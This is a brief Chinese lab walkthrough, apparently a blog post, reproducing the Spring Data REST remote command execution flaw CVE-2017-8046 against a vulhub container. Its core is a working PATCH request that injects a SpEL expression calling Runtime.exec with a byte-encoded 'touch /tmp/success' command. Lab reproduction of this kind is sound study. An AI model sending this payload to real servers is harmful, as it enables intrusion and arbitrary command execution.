Spring Data Rest 远程命令执行命令(CVE-2017-8046)

谪仙1232024-09-24 16:31

(1)访问 http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改

PATCH /customers/1 HTTP/1.1

Host:

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json-patch+json

Content-Length: 202

{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }

返回kali 输入命令进docker入容器 ls /tmp查看 可以发现 成功创建success

相关推荐
DanB245 分钟前
Java(多线程)
java·开发语言·python
O***p60410 分钟前
Java在分布式中的Archaius
java·开发语言·分布式
在繁华处12 分钟前
JAVA实战:文件管理系统1.0
java·开发语言·前端
算法与编程之美14 分钟前
Java数组动态扩容
java·开发语言·python·算法
曹牧32 分钟前
Java: Json的键值双引号
java·chrome·json
z***026034 分钟前
springboot整合modbus实现通讯
数据库·spring boot·后端
有一个好名字35 分钟前
Spring AI ——Java开发者的AI集成神器
java·人工智能·spring
i***683237 分钟前
Spring Boot--@PathVariable、@RequestParam、@RequestBody
java·spring boot·后端
p***950041 分钟前
Plugin ‘org.springframework.bootspring-boot-maven-plugin‘ not found的解决方法
java·maven
h***06651 小时前
Spring Boot 集成 Kettle
java·spring boot·后端
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连07本地部署阿里最新开源的Z-Image0846个Nano-banana 精选提示词,持续更新中09Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽10Labelme从安装到标注:零基础完整指南